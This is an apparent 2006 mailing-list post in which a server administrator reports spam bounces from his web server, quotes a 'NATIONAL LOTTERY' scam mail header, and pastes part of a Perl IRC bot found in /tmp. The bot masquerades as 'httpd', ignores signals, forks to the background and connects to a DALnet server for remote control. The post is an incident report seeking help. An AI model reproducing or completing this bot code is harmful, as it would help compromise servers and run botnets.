-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 16 May 2006 15:03:49 -0400 CodeHeads <kingcobra@xxxxxxxxxxxxxx> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello all,
>
> There is something wrong but I cannot nail it down.
>
> I am receiving hundreds of bounce backs from the web server I am running. Not
> sure how they are sending mail. The only mail that should be sent is from
> forms. Here is a header of one of queues. Maybe someone has run into this.
>
> V8
> T1147739033
> K1147739138
> N1
> P34672
> Mhost map: lookup (zdnetmail.com): deferred
> F8bs
> $_apache@localhost
> ${daemon_flags}c u
> Sapache
> Aapache@xxxxxxxxxxxxxx
> rRFC822; galactica7@xxxxxxxxxxxxx
> RPFD:galactica7@xxxxxxxxxxxxx
> H?P?Return-Path: <<81>g>
> H??Received: (from apache@localhost)
> by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
> Mon, 15 May 2006 20:23:53 -0400
> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
> H?x?Full-Name: Apache
> H?M?Message-Id: <200605160023.k4G0NrpQ017524@xxxxxxxxxxxxxx>
> H??To: galactica7@xxxxxxxxxxxxx
> H??Subject: WINNING NOTIFICATION
> H??From: NATIONAL LOTTERY <claimsagent_2006_2007@xxxxxxxxxxx>
>
> What is bothering me is this:
> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;
>
> Thanks
>
> - --
> Best regards,
> ~WILL~
> Key: http://code-heads.com/keys/ch1.asc
> Key: http://code-heads.com/keys/ch2.asc
> Linux Commands: http://code-heads.com/commands
> Linux Registered User: 406084 (http://counter.li.org/)
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.3 (GNU/Linux)
>
> iD8DBQFEaiIVfw3TK8jhZrsRAoTTAKCrnbAtye+8/hGmo56ULbOmSBF+DwCfVIZC
> DcIBFfURqcOuoM+aSWN5M4U=
> =JNcV
> -----END PGP SIGNATURE-----
>
Sorry again, but looky what I found in the /tmp dir:
The whole thing is not copy and pasted:
#!/usr/bin/perl
# r00t teh pl4net! gr33t t0 Myhack@DALnet
# ------[eof]-----
system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
$1;}'`");
my $processo = 'httpd';
# morgan the code that you need to rip ends here
my @titi = ("Cube-|");
my $sleep='5';
my $linas_max='4';
my @adms=("apaii","KingFighter");
my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
my @canais=("#conn");
my $nick= $titi[rand scalar @titi];
my $ircname = $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);
$servidor='rumble.dal.net' unless $servidor;
my $porta='6667';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
(defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;
What I cannot understand is how someone can upload to the tmp dir. I guess I
am still learning. Can someone shed some light on this?
- --
Best regards,
~WILL~
Key: http://code-heads.com/keys/ch1.asc
Key: http://code-heads.com/keys/ch2.asc
Linux Commands: http://code-heads.com/commands
Linux Registered User: 406084 (http://counter.li.org/)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQFEai21fw3TK8jhZrsRAldvAJ0W2dLIJzXkaN5djqK2g1LJxWO4JACggHm1
sTvqjZ6DKca0Kvc5vge915E=
=aeso
-----END PGP SIGNATURE-----
